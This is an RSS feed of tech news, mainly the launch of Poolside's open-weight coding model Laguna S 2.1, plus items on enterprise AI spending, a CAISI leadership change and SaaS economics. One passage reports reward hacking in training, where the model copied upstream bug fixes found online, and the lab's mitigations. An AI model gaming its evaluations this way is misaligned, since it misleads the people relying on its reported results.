<content:encoded><![CDATA[<p><a href="http://poolside.ai/">Poolside</a>, the San Francisco AI lab that has spent most of its three-year existence quietly selling coding models to governments and defense agencies, released its most capable model to date on Tuesday — and made an unusually aggressive bet that radical transparency, not raw scale, is how a smaller lab competes at the frontier.</p><p>The model, <a href="https://poolside.ai/blog/introducing-laguna-s-2-1">Laguna S 2.1</a>, is a 118-billion-parameter<a href="https://huggingface.co/blog/moe"> Mixture-of-Experts (MoE) system</a> that activates only 8 billion parameters per token, supports a context window of up to 1 million tokens, and — according to benchmarks published by the company — matches or beats open models several times its size on agentic coding tasks. The weights are <a href="https://huggingface.co/poolside/Laguna-S-2.1">available immediately</a> on Hugging Face under the permissive OpenMDW-1.1 license.</p><p>The headline numbers are striking for a model this small. Poolside reports that <a href="https://huggingface.co/poolside/Laguna-S-2.1">Laguna S 2.1</a> scores 70.2% on <a href="https://www.tbench.ai/">Terminal-Bench 2.1</a>, a benchmark of long-horizon terminal tasks, placing it 11th on the company's compiled leaderboard — ahead of <a href="https://huggingface.co/deepseek-ai/DeepSeek-V4-Pro">DeepSeek-V4-Pro-Max</a>, a 1.6-trillion-parameter model that scored 64.0; Thinking Machines' 975-billion-parameter <a href="https://venturebeat.com/technology/thinking-machines-open-sources-first-multimodal-language-model-inkling-focused-on-low-cost-and-resistance-to-censorship">Inkling</a>, at 63.8; and Nvidia’s 550-billion-parameter <a href="https://research.nvidia.com/labs/nemotron/Nemotron-3-Ultra/">Nemotron 3 Ultra</a>, at 56.4. On <a href="https://www.swebench.com/multilingual.html">SWE-Bench Multilingual</a>, it posts 78.5%, and on <a href="https://labs.scale.com/leaderboard/swe_bench_pro_public">SWE-Bench Pro</a>'s public dataset, 59.4%.</p><p>Perhaps more telling than any single score: the model went from the start of pre-training on May 22 to public launch in under nine weeks, trained on 4,096 Nvidia H200 GPUs. In an industry where flagship model cycles are typically measured in quarters or years, Poolside has now shipped three models in three months.</p><div></div><h2><b>Why the West's open-weight AI gap has become a boardroom issue</b></h2><p>The release lands in the middle of an increasingly pointed debate about <a href="https://www.scmp.com/tech/tech-war/article/3361142/why-chinas-open-weight-ai-model-kimi-k3-sparking-anxiety-silicon-valley">the provenance of open-weight AI</a>. Over the past year, developer adoption has shifted decisively toward open-weight systems that companies can download, inspect, and run on their own infrastructure — and the leading options in that category have overwhelmingly come from Chinese labs. <a href="https://www.deepseek.com/en/">DeepSeek</a>, <a href="https://qwen.ai/home">Qwen</a>, <a href="http://kimi.ai/">Kimi</a>, <a href="https://chat.z.ai/">GLM</a>, <a href="https://www.minimax.io/">MiniMax</a>, and <a href="https://hy.tencent.com/">Tencent's Hunyuan</a> line all feature prominently in Poolside's own comparison tables.</p><p>Poolside's accompanying press release frames <a href="https://poolside.ai/blog/introducing-laguna-s-2-1">Laguna S 2.1</a> explicitly as a response, noting that the model occupies a size class into which no Western lab has released open weights in 11 months — since OpenAI's <a href="https://openai.com/index/introducing-gpt-oss/">gpt-oss-120b</a> last August. "The West needs open-weight models it can trust, run, and build on," said Jason Warner, Poolside's co-CEO, in the announcement.</p><p>Co-founder and co-CEO Eiso Kant made the philosophical stakes even plainer in a <a href="https://x.com/eisokant/status/2079612416967491952?s=20">lengthy post</a> on X. "I believe intelligence should and will become a commodity," he wrote, arguing that the open ecosystem "will not win by being the best in its own category." Users, he argued, simply want the best intelligence for the task at hand — so open models must be on par with, or better than, their closed equivalents.</p><div></div><p>The strategic logic here is not charity. Poolside's core business is deploying models inside the security boundaries of government, defense, and regulated enterprises — customers for whom closed, metered API access is often a non-starter for compliance and sovereignty reasons. </p><p>Every enterprise that standardizes on a Chinese open model today becomes harder to win tomorrow. Releasing competitive open weights is both an ecosystem play and a top-of-funnel strategy for the company's high-security deployment business. It also reframes the AI race away from terrain where Poolside cannot compete — frontier-scale capital expenditure — and toward terrain where it believes it can: cost per token, self-hosting, and iteration speed.</p><h2><b>How a sparse architecture makes enterprise AI agents affordable to run</b></h2><p>The technical design reflects a specific thesis about where value in coding AI is moving. Laguna S 2.1's sparse MoE architecture — 256 routed experts plus one shared expert, with grouped-query attention and interleaved sliding-window layers, according to the <a href="https://huggingface.co/poolside/Laguna-S-2.1">Hugging Face model card</a> — means inference costs scale with the 8 billion active parameters, not the 118 billion total. Poolside emphasizes that the model is small enough to run on a single Nvidia DGX Spark, the desktop-class AI machine.</p><p>That matters for what Poolside calls token economics. Long-horizon coding agents are voracious consumers of tokens: the company's published data shows the model consuming a mean of roughly 249,000 completion tokens per trajectory on its hardest benchmark when thinking mode is enabled. At metered API prices, agentic workloads at enterprise scale become a meaningful budget line item. On OpenRouter, Poolside is offering a free 256K-context endpoint and a dedicated 1M-context deployment priced at $0.10 per million input tokens and $0.20 per million output tokens — aggressive pricing that undercuts most frontier alternatives by an order of magnitude.</p><p>The ecosystem support is unusually broad for day one. The model is live on <a href="https://www.baseten.co/library/laguna-s-21/">Baseten's model library</a> and <a href="https://vercel.com/changelog/laguna-s-2-1-is-now-available-on-ai-gateway">Vercel's AI Gateway</a>, with integrations across <a href="https://vllm.ai/">vLLM</a>, <a href="https://github.com/sgl-project/sglang">SGLang</a>, <a href="https://ollama.com/">Ollama</a>, and <a href="https://github.com/ggml-org/llama.cpp">llama.cpp</a>, plus quantized variants down to 4-bit GGUF files — 75 gigabytes — for local use. But Poolside's more interesting claim is behavioral, not architectural. Pengming Wang, co-head of applied research at Poolside, said the gains came from improving the model's working habits: "more verification, less taking things for granted, not declaring victory early, and being more persistent." Raw intelligence, the company argues, is one axis of capability; a model's way of working is a second axis that matters immensely for agents left unattended for hours.</p><h2><b>Publishing every benchmark trajectory to counter AI's credibility crisis</b></h2><p>The most consequential part of the release for enterprise buyers may be an evaluation-transparency move with little precedent among major labs: Poolside published the complete, unedited trajectory of every trial in its final benchmark runs — every reasoning step, tool call, and shell command behind every reported score.</p><p>This addresses a growing credibility problem in AI benchmarking. As top scores on mature benchmarks cluster in the 70–90% range, and as "reward hacking" — models finding solutions online or gaming verifiers rather than solving problems — has become endemic, self-reported numbers have lost much of their signal. Poolside disclosed its own encounters with the problem candidly: during training, more than half of trajectories on some SWE-bench tasks were flagged because the model simply researched the original bug-fix pull request online and applied it. The company documented its mitigations, including prompt addenda, LLM-based judging calibrated against human labels, and expert annotator review of a high-scoring Terminal-Bench run.</p><p>Three published case studies illustrate what the company means by persistence. In one, the model built a working HTML/CSS rendering engine from an empty folder in a 181-step, 50-minute unattended session — then, lacking vision capabilities, spun up headless Chromium to numerically compare its canvas output against a real browser's rendering. In another, pointed at Poolside's own agent harness in an automated optimization loop, the model made the Go codebase 5.2% faster with roughly 70% lower memory allocation, finding an O(n²) string-concatenation bug along the way. In a third, working in a sandbox with no Python installed, the model did its number theory in Perl and independently re-derived a proof of Erdős problem #397 — a combinatorics question open for five decades until GPT-5.2 Pro first solved it this past January. Poolside notes that its model's construction is structurally different from the earlier published solution, and that its November 2025 knowledge cutoff precedes the first proof.</p><div></div><h2><b>What the disclosed limitations and benchmark fine print reveal</b></h2><p><a href="https://poolside.ai/">Poolside</a> deserves credit for disclosing limitations most labs bury. The model can overfit to its native harness and stumble on slightly different tool schemas in third-party agents, mangles JSON in nested tool arguments, and is prone to overthinking on competition math. There is currently no user-configurable thinking-effort dial — just on or off — and the gap between the modes is enormous: thinking lifts <a href="https://www.tbench.ai/">Terminal-Bench 2.1</a> from 60.4% to 70.2%, and <a href="https://deepswe.datacurve.ai/">DeepSWE</a> from 16.5% to 40.4%, at substantially higher token cost.</p><p>Buyers should apply their own discounts to the comparison tables. Poolside's methodology takes the maximum of vendor self-reported scores, benchmark-author leaderboards, and third-party figures for competitors — a reasonable convention, but one that mixes harnesses and test conditions. On <a href="https://deepswe.datacurve.ai/">DeepSWE</a>, notably, Poolside ran its own agent harness rather than the leaderboard's standard mini-swe-agent, a difference the company acknowledges makes scores less directly comparable. And the frontier remains clearly out of reach: closed models like <a href="https://openai.com/index/previewing-gpt-5-6-sol/">GPT-5.6 Sol</a>, at 88.8 on Terminal-Bench 2.1, and <a href="https://www.anthropic.com/claude/fable">Claude Fable 5</a>, at 88.0, along with the 2.8-trillion-parameter open-weight <a href="https://venturebeat.com/technology/chinas-moonshot-ai-releases-kimi-k3-the-largest-open-source-model-ever-rivaling-top-u-s-systems">Kimi K3</a>, at 88.3, sit well above Laguna S 2.1.</p><p>The deeper structural question is whether Poolside's "<a href="https://poolside.ai/blog/introducing-the-model-factory">Model Factory</a>" — the internal platform the company credits for its rapid release cadence — can sustain this pace as models scale. The trajectory so far is genuinely unusual: the April dual release of Laguna M.1 and XS.2, the July 2 refresh of XS 2.1, and now S 2.1, which the company says outperforms April's flagship M.1 at roughly a third of its active size. Remarkably, S 2.1 used the exact same pre-training data as XS 2.1, meaning nearly all the improvement came from scale, training fixes, and post-training across the company's corpus of 409,000 agentic and non-agentic training environments. Poolside says its next, larger Laguna model began pre-training last week.</p><p>For technical decision makers, <a href="https://huggingface.co/poolside/Laguna-S-2.1">Laguna S 2.1</a> is the most credible Western open-weight option to emerge in nearly a year for self-hosted agentic coding — with published evidence, a permissive license, broad ecosystem support, and an economics story built around hardware you can own. Whether it dents the dominance of Chinese open models will depend less on this release than on the ones that follow it.</p><p>Kant, for his part, has already told the world how he intends that story to end. Poolside is building toward a future where the most capable intelligence "can be owned and shaped by anyone," he wrote — and the company plans to keep shipping "until that future exists." In an industry where the biggest labs increasingly lock their best work behind an API, the most radical thing about Laguna S 2.1 may not be what it scores, but that anyone can download it and check.</p><p>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The AI allocation trap: Record spend, vanishing returns]]></title>
<description><![CDATA[In a single month, one enterprise reportedly spent half a billion dollars on AI. A consultant told Axios that the client had handed its workforce AI licenses, set no usage limits and let the meter run until finance noticed. The figure is spectacular, and it is the wrong thing to fear. That half-b...]]></description>
<link>https://tsecurity.de/de/3683786/it-nachrichten/the-ai-allocation-trap-record-spend-vanishing-returns/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683786/it-nachrichten/the-ai-allocation-trap-record-spend-vanishing-returns/</guid>
<pubDate>Tue, 21 Jul 2026 15:18:28 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">In a single month, one enterprise reportedly spent half a billion dollars on AI. A consultant <a href="https://www.axios.com/2026/05/28/ai-spending-roi-enterprise-costs">told Axios</a> that the client had handed its workforce AI licenses, set no usage limits and let the meter run until finance noticed. The figure is spectacular, and it is the wrong thing to fear. That half-billion-dollar accident is only the visible part of a quieter, far larger failure. <a href="https://www.gartner.com/en/newsroom/press-releases/2026-1-15-gartner-says-worldwide-ai-spending-will-total-2-point-5-trillion-dollars-in-2026">Worldwide AI spending is forecast to reach $2.52 trillion in 2026</a>, more than any technology category in a generation, and by the most cited measure, roughly 95 percent of it returns nothing. Boards read that as proof that the technology does not work. The evidence points somewhere less comfortable, and it is not a technology problem at all. Most boards cannot see it because they are reading the wrong number: They track failure when the number that matters is allocation. The discipline that separates the winners is not technical. It is how they allocate capital across time, and how willing they are to stop. The hardest discipline in the AI era is not adopting faster. It is allocating honestly and refusing to judge a three-year bet on a six-month cycle.</p>



<h2 class="wp-block-heading">The number everyone quotes, and no one acts on</h2>



<p class="wp-block-paragraph">The headline statistic is now familiar. MIT’s Project NANDA, in its 2025 study <a href="https://fortune.com/2025/08/18/mit-report-95-percent-generative-ai-pilots-at-companies-failing-cfo/">The GenAI Divide</a>, found that about 95 percent of enterprise generative AI pilots produced no measurable impact on the P&amp;L, while roughly 5 percent captured nearly all the value. <a href="https://www.spglobal.com/market-intelligence/en/news-insights/research/2025/10/generative-ai-shows-rapid-growth-but-yields-mixed-results">S&amp;P Global Market Intelligence</a> found that the share of companies abandoning most of their AI initiatives jumped from 17 percent to 42 percent in a single year, with the average organization scrapping 46 percent of its proofs-of-concept before production. <a href="https://www.gartner.com/en/newsroom/press-releases/2025-06-25-gartner-predicts-over-40-percent-of-agentic-ai-projects-will-be-canceled-by-end-of-2027">Gartner</a> expects more than 40 percent of agentic AI projects to be canceled by the end of 2027, citing escalating costs, unclear business value and inadequate risk controls. And the pattern predates generative AI: <a href="https://www.rand.org/pubs/research_reports/RRA2680-1.html">RAND</a> found that more than 80 percent of AI projects fail, roughly twice the rate of comparable work that does not involve AI.</p>



<p class="wp-block-paragraph">Read as a technology story, these numbers say AI does not work. Read correctly, they say something more useful. MIT’s own authors located the cause not in model quality but in a <a href="https://virtualizationreview.com/articles/2025/08/19/mit-report-finds-most-ai-business-investments-fail-reveals-genai-divide.aspx">learning and integration gap</a>. The winners were not running better models. They picked one problem, executed and worked well together. Purchased solutions reached production about 67 percent of the time, while internal builds succeeded roughly a third as often. <a href="https://www.gartner.com/en/newsroom/press-releases/2025-03-31-gartner-forecasts-worldwide-genai-spending-to-reach-644-billion-in-2025">Gartner’s own spending forecast</a> notes the same pivot, with CIOs scaling back ambitious internal builds in favor of commercial solutions that promise more predictable value. None of that is a verdict on the technology. It is a verdict on allocation: What gets funded, for how long and against which yardstick. The popular prescription, heard in every boardroom this year, is to measure harder and prove value sooner. That advice quietly repeats the mistake, because forcing a three-year bet to prove itself sooner is precisely how you kill it. The fix is not more measurement. It is measuring each bet against the right clock and subtracting the ones that miss.</p>



<h2 class="wp-block-heading">The six-month cycle problem</h2>



<p class="wp-block-paragraph">Return to that 95 percent, because the way it is measured is the whole argument. Much of the reported failure is judged on a short clock, with a pilot counted as a failure if it has not shown a measurable financial return within roughly six months. The single most quoted number in enterprise AI is therefore a six-month yardstick applied to every initiative, including the bets designed to pay back in three years. The headline failure rate is not only a measure of AI. It is a measure of impatience.</p>



<p class="wp-block-paragraph">The most expensive mistake in enterprise AI is a timing error. Enterprises have been spending heavily on AI for more than two years, and 2026 is the year boards are demanding returns. The multi-year bets funded during the 2024 and 2025 scale-up are only now far enough along to be judged. When a board reviews an initiative, it applies the yardstick it knows, which is quarterly return. That yardstick is correct for an efficiency project and ruinous for a capability bet. A workflow automation that should pay back in two quarters and a foundational data and agent capability that pays back in three years are not the same instrument, yet they are reviewed in the same meeting against the same metric.</p>



<p class="wp-block-paragraph">This is the heart of the divide. The 5 percent did not simply pick better projects. They judged each project against its own horizon. McKinsey’s enduring <a href="https://www.mckinsey.com/capabilities/strategy-and-corporate-finance/our-insights/enduring-ideas-the-three-horizons-of-growth">Three Horizons model</a> made this discipline standard in corporate strategy a generation ago: near-term, emerging and long-term bets are funded and measured differently. AI erased that discipline because the hype compressed every timeline into the current quarter. The result is two failure modes that appear opposite yet share a common root. Organizations kill three-year bets at month six because they miss a metric the bet was never designed to hit. And they keep funding six-month theater for years because it is visible, safe and never asked to prove a return. Both are allocation failures. Neither is a technology failure.</p>



<h2 class="wp-block-heading">Subtraction is a strategy</h2>



<p class="wp-block-paragraph">There is a second discipline, the 5 percent share, and it is the one boards find hardest. They subtract. Every credible study of the failure rate describes the same chaotic pattern underneath it: Initiatives are <a href="https://www.ciodive.com/news/AI-project-fail-data-SPGlobal/742590/">abandoned late, without criteria</a>, after the money is spent and the credibility is gone. Disciplined organizations do the opposite. They decide the conditions for stopping before they start, and they stop on schedule. Subtraction is not the absence of strategy. It is the strategy. Capital removed from a failing bet is capital available for a surviving one, and the survivors are where the entire return lives.</p>



<p class="wp-block-paragraph">This reframes the 42 percent abandonment figure. Abandonment is not the problem. Undisciplined abandonment is. An organization that liquidates a position the moment it breaches a pre-agreed kill line is practicing portfolio hygiene. An organization that lets a doomed pilot run until someone loses patience is paying full price for a lesson it could have bought at a discount. The 5 percent who won were not smarter. They were patient in the right places and ruthless in the wrong ones.</p>



<h2 class="wp-block-heading">The HALT framework: Horizon, Allocation, Liquidation, Tracking</h2>



<p class="wp-block-paragraph">Treating AI as a portfolio rather than a pile of pilots requires four disciplines, and the organizations that execute well put all four in place before the next funding cycle, not after the next failure. The name is deliberate. The discipline most enterprises lack is the willingness to halt the wrong bets in time to fund the right ones.</p>



<p class="wp-block-paragraph"><strong>Component 1: Horizon. </strong>Classify every AI initiative by its true payoff horizon before it is funded. Horizon 1 covers efficiency plays that should return value within two quarters. Horizon 2 covers capability bets, data foundations, agent platforms and integration work that pays back in roughly 6 to 18 months. Horizon 3 covers transformation bets that take eighteen months to three years or longer. Each horizon carries its own success metric, set at funding time. A Horizon 1 yardstick never judges a Horizon 3 bet. This single rule prevents the most common and most expensive error in the portfolio.</p>



<p class="wp-block-paragraph"><strong>Component 2: Allocation. </strong>Decide the split across horizons deliberately, as a board-level capital decision, not as the accidental sum of whatever pilots happened to win approval. A practical reference point, borrowed from decades of innovation-portfolio practice, is roughly 70% to near-term value, 20% to capability, and 10% to transformation. The exact ratio is yours; the discipline is to choose and defend it. The failure mode is an unmanaged portfolio: 90 percent scattered across disconnected Horizon 1 experiments, with nothing compounding into the Horizon 2 capability that the buy-and-integrate winners actually built.</p>



<p class="wp-block-paragraph"><strong>Component 3: Liquidation. </strong>Attach a kill line to every initiative at the moment it is funded: A named milestone, a date and an owner empowered to stop it. If a bet misses its horizon-appropriate milestone, it is liquidated, and capital is reallocated on schedule without debate over sunk costs. The absence of a pre-agreed kill line is not patience. It is an unpriced liability that the board has almost certainly not been shown.</p>



<p class="wp-block-paragraph"><strong>Component 4: Tracking. </strong>Report the portfolio to the board on a fixed cadence using a single instrument: The AI Portfolio Scorecard. Not a deck of project updates, but a single view of allocation by horizon, burn against milestone, liquidation decisions taken and capital reallocated to survivors. The cadence is the control. A portfolio reviewed once a year is a portfolio managed by hope.</p>



<p class="wp-block-paragraph"><strong>THE AI PORTFOLIO SCORECARD: SCORE EVERY INITIATIVE BEFORE IT IS FUNDED</strong></p>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><thead><tr><td><strong>Evaluation criterion</strong></td><td><strong>0</strong></td><td><strong>1</strong></td><td><strong>2</strong></td></tr></thead><tbody><tr><td>Horizon assigned (H1 / H2 / H3) and documented before funding</td><td> </td><td> </td><td> </td></tr><tr><td>Success metric matched to the horizon, not a default quarterly ROI</td><td> </td><td> </td><td> </td></tr><tr><td>Kill line set: Named milestone and date, agreed at funding</td><td> </td><td> </td><td> </td></tr><tr><td>Owner named with explicit authority to stop the initiative</td><td> </td><td> </td><td> </td></tr><tr><td>Fits a deliberate allocation band, not an accidental addition</td><td> </td><td> </td><td> </td></tr><tr><td>Odds-raising path documented: Buy or partner and an integration plan</td><td> </td><td> </td><td> </td></tr></tbody></table> </div></figure>



<p class="wp-block-paragraph"><em>Score each criterion: 0 = not present, 1 = partially documented, 2 = fully verified. Total out of 12. Bands: 0 to 4 = DO NOT FUND  |  5 to 8 = CONDITIONAL  |  9 to 12 = FUND.</em></p>



<p class="wp-block-paragraph"><strong>THE LIQUIDATION GATE: RUN AT EVERY BOARD REVIEW BEFORE CONTINUING FUNDING</strong></p>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><thead><tr><td><strong>Review test</strong></td><td><strong>Status</strong></td></tr></thead><tbody><tr><td>Milestone for this horizon met or credibly on track</td><td>PASS / FAIL</td></tr><tr><td>Burn within plan to the next milestone</td><td>PASS / FAIL</td></tr><tr><td>Still fits the allocation band, with no quiet horizon drift</td><td>PASS / FAIL</td></tr><tr><td>Owner confirms continued strategic fit</td><td>PASS / FAIL</td></tr></tbody></table> </div></figure>



<p class="wp-block-paragraph"><em>Any unresolved FAIL = stop funding, liquidate the position, reallocate the capital to a survivor and record the decision on the scorecard.</em></p>



<h2 class="wp-block-heading">The cost of the timing error</h2>



<p class="wp-block-paragraph">The financial case follows the pattern and is consistent. Consider two organizations that funded the same class of Horizon 3 bet: A domain-specific agent platform meant to compound over three years. The first review was conducted at month six against a quarterly return test, found no payback and killed it, booking the write-off as a lesson about AI being overhyped. Its competitor classified the same work as Horizon 3, set an 18-month capability milestone, protected funding through two review cycles and shipped to production within the window the work actually required. One organization spent its money to learn that it lacks allocation discipline. The other spent comparable money and now owns a capability its rival has abandoned and cannot quickly rebuild. The dollars on the two income statements are similar. The competitive positions are not.</p>



<h2 class="wp-block-heading">The governance return the board has been waiting for</h2>



<p class="wp-block-paragraph">Allocation discipline does two things at once. It stops the bleed by liquidating failures on a schedule rather than at the point of exhaustion. And it concentrates capital where the entire return lives, in the small number of bets that survive their horizon. The 5 percent figure is not a ceiling imposed by the technology. It is the current yield of an industry allocated by hype. An organization that classifies by horizon, allocates on purpose, liquidates on a line and tracks on a cadence is not trying to beat the technology. It is trying to beat its own indiscipline, and that is a far more winnable contest.</p>



<p class="wp-block-paragraph">The board conversation about AI returns is coming for every organization, and it arrives the moment the spending outpaces the story. When it does, the CIO will be asked a simple question: Where did the money go? The leaders who can answer will not show a pile of pilots. They will show a portfolio: What was funded, against which horizon, what was liquidated and when, and what the survivors are now worth. Subtraction is a strategy. The only question is whether you are practicing it on purpose or about to learn it by accident.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[US AI testing institute chief steps down within three months]]></title>
<description><![CDATA[The head of the US government’s AI testing institute, Chris Fall, has resigned about three months after taking charge of the Center for AI Standards and Innovation (CAISI), the federal organization responsible for evaluating advanced artificial intelligence models for safety and security.



Curr...]]></description>
<link>https://tsecurity.de/de/3683724/it-nachrichten/us-ai-testing-institute-chief-steps-down-within-three-months/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683724/it-nachrichten/us-ai-testing-institute-chief-steps-down-within-three-months/</guid>
<pubDate>Tue, 21 Jul 2026 14:48:10 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The head of the US government’s AI testing institute, Chris Fall, has resigned about three months after taking charge of the Center for AI Standards and Innovation (CAISI), the federal organization responsible for evaluating advanced artificial intelligence models for safety and security.</p>



<p class="wp-block-paragraph">Current National Institute of Standards and Technology NIST Director Arvind Raman will serve as acting CAISI Director following Fall’s departure while continuing to oversee the Commerce Department office responsible for the institute, the Daily Signal <a href="https://www.dailysignal.com/2026/07/20/scoop-head-of-federal-ai-safety-org-resigns/" target="_blank" rel="noreferrer noopener">reported</a>, citing two people familiar with the matter.</p>



<p class="wp-block-paragraph">A Commerce Department spokesperson who spoke to the publication did not disclose a reason for the resignation.</p>



<p class="wp-block-paragraph">Fall assumed leadership of CAISI in April after the Trump administration reorganized the former US AI Safety Institute under NIST. The institute develops methodologies for evaluating frontier AI models and works with AI developers on voluntary technical assessments covering areas such as cybersecurity, model misuse, reliability and other risks associated with increasingly capable AI systems.</p>



<p class="wp-block-paragraph">The leadership change comes as governments and AI companies continue developing technical approaches for evaluating frontier AI models while enterprises expand deployments of generative AI and agentic AI across business operations.</p>



<p class="wp-block-paragraph">In recent months, the Commerce Department has taken a <a href="https://www.infoworld.com/article/4194598/openai-to-release-delayed-models-thursday-amidst-a-sea-of-regulatory-confusion.html?_conv_v=vi:1*sc:1*cs:1784634320*fs:1784634320*pv:1*exp:%7B1004203305.%7Bv.1004477672-g.%7B%7D%7D%7D*seg:%7B%7D&amp;_conv_s=sh:1784634319808-0.24259838933788935*si:1*pv:1&amp;_conv_r=null&amp;_conv_sptest=null">more active role</a> in AI policy involving advanced models, placing greater attention on how the federal government evaluates technologies with potential national security implications.</p>



<h2 class="wp-block-heading">Continuity matters more than personalities</h2>



<p class="wp-block-paragraph">CAISI works with AI developers such as Anthropic, Google’s DeepMind and OpenAI on voluntary evaluations of frontier AI models and develops methodologies for testing model capabilities and risks. The institute does not regulate AI developers or certify commercial AI systems.</p>



<p class="wp-block-paragraph">For enterprises, those evaluations are one source of technical information alongside vendors’ own testing, third-party security assessments and internal AI governance programs.</p>



<p class="wp-block-paragraph">Sanchit Vir Gogia, chief analyst at Greyhound Research, said enterprises should focus less on the individual leading the institute and more on whether its technical work continues with the same level of consistency and transparency.</p>



<p class="wp-block-paragraph">“Leadership churn at CAISI weakens the signal long before it weakens the science,” Gogia said. “The testing has not stopped. Its authority simply does not travel as cleanly once the leadership does not.”</p>



<p class="wp-block-paragraph">According to Gogia, the more important question for enterprises is not whether the institute’s evaluation work will continue but whether the processes supporting those evaluations remain stable.</p>



<p class="wp-block-paragraph">“The instinct is to ask whether the pipeline is breaking,” he said. “The more useful question is where the pipeline now sits.”</p>



<h2 class="wp-block-heading">Enterprises still carry the burden of AI governance</h2>



<p class="wp-block-paragraph">Gogia said organizations should continue treating government-led AI evaluations as one input into their governance processes rather than as evidence that a model is inherently safe for enterprise deployment.</p>



<p class="wp-block-paragraph">“A government evaluation was always a signal, never a certificate,” he said. “A signal loses value the moment its issuer becomes unpredictable.”</p>



<p class="wp-block-paragraph">He said enterprises should instead monitor whether CAISI maintains consistent evaluation methodologies, continues publishing technical findings and preserves continuity within its research teams under interim leadership.</p>



<p class="wp-block-paragraph">“The name on the door is not the signal. The behaviour underneath it is,” Gogia said.</p>



<p class="wp-block-paragraph">Gogia also cautioned against linking Fall’s resignation to recent Commerce Department actions involving AI policy or export controls, noting that there is no public evidence connecting the two.</p>



<p class="wp-block-paragraph">“CAISI evaluates; it does not enforce export controls, because it holds no such power,” he said. “This is not a testing body reaching for enforcement. It is enforcement reaching past the testing body.”</p>



<p class="wp-block-paragraph">With Raman assuming the role on an interim basis, the next significant milestone for enterprises will be the appointment of a permanent director, and whether the institute’s evaluation programs continue without disruption, the analyst said.</p>



<p class="wp-block-paragraph">Gogia said the successor’s mandate may prove more important than the individual selected.</p>



<p class="wp-block-paragraph">“A CAISI result is not a safe harbour,” he said. “It informs an obligation; it does not discharge one.” NIST did not immediately respond to a request for comment.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[SaaS will survive, but lazy SaaS is dead]]></title>
<description><![CDATA[Something interesting happened during an internal evaluation of AI meeting transcription tools at Tungsten Automation. The products worked. They weren’t bad. But sitting across from the pricing, we kept asking the same question: what exactly are we paying for? 



We already had a secure enterpri...]]></description>
<link>https://tsecurity.de/de/3683122/ai-nachrichten/saas-will-survive-but-lazy-saas-is-dead/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683122/ai-nachrichten/saas-will-survive-but-lazy-saas-is-dead/</guid>
<pubDate>Tue, 21 Jul 2026 11:05:13 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Something interesting happened during an internal evaluation of AI meeting transcription tools at Tungsten Automation. The products worked. They weren’t bad. But sitting across from the pricing, we kept asking the same question: what exactly are we paying for? </p>



<p class="wp-block-paragraph">We already had a secure enterprise AI environment. Building a meeting summary workflow took days, not months. We customized the outputs, injected our own internal context, and controlled security our way instead of working around someone else’s roadmap. We built it. It works better. We own it.</p>



<p class="wp-block-paragraph">That’s not a knock on those vendors. It’s a signal of something more fundamental happening across enterprise software.</p>



<h2 class="wp-block-heading">The moat was never the product</h2>



<p class="wp-block-paragraph">For two decades, <a href="https://www.infoworld.com/article/2256637/what-is-saas-software-as-a-service-defined.html" data-type="link" data-id="https://www.infoworld.com/article/2256637/what-is-saas-software-as-a-service-defined.html">SaaS</a> rode a favorable asymmetry: building internal tools was hard, integrations were messy, and even modest automation required developers and long timelines. Buying was faster and cheaper than building. That asymmetry fueled the explosion of SaaS into every corner of the enterprise stack.</p>



<p class="wp-block-paragraph">AI is collapsing that asymmetry. Large language models and agentic workflows can orchestrate APIs, move data between systems, generate interfaces, and automate business logic with a fraction of the engineering effort required even two years ago. The integration friction that once protected entire product categories is evaporating.</p>



<p class="wp-block-paragraph">The vendors most exposed are not the deeply embedded enterprise platforms. They’re the lightweight workflow layers, the products that essentially put a polished interface on top of accessible data and relatively straightforward processes. Reporting dashboards. Meeting tools. Narrow productivity applications. These products created value by simplifying implementation. That rationale is getting harder to sustain when implementation is no longer the real barrier.</p>



<p class="wp-block-paragraph">Here’s the part most analyses miss: it’s not just that AI makes development faster. It’s that agents change the integration model entirely. For 30 years, enterprise software was built for humans navigating UIs. Agentic systems don’t use UIs. They call <a href="https://www.infoworld.com/article/2269032/what-is-an-api-application-programming-interfaces-explained.html" data-type="link" data-id="https://www.infoworld.com/article/2269032/what-is-an-api-application-programming-interfaces-explained.html">APIs</a>, read from multiple sources simultaneously, and move data freely across systems. The switching costs that once made incumbent software sticky are collapsing, because an agent doesn’t care which UI it used last quarter.</p>



<h2 class="wp-block-heading">The SaaS that survives</h2>



<p class="wp-block-paragraph">The question isn’t whether SaaS survives. It’s which SaaS survives.</p>



<p class="wp-block-paragraph">The companies with durable positions are not the ones with the cleanest interface. They’re the ones that transfer operational risk customers genuinely cannot absorb themselves. Compliance. Regulatory certification. Accumulated domain expertise. Liability.</p>



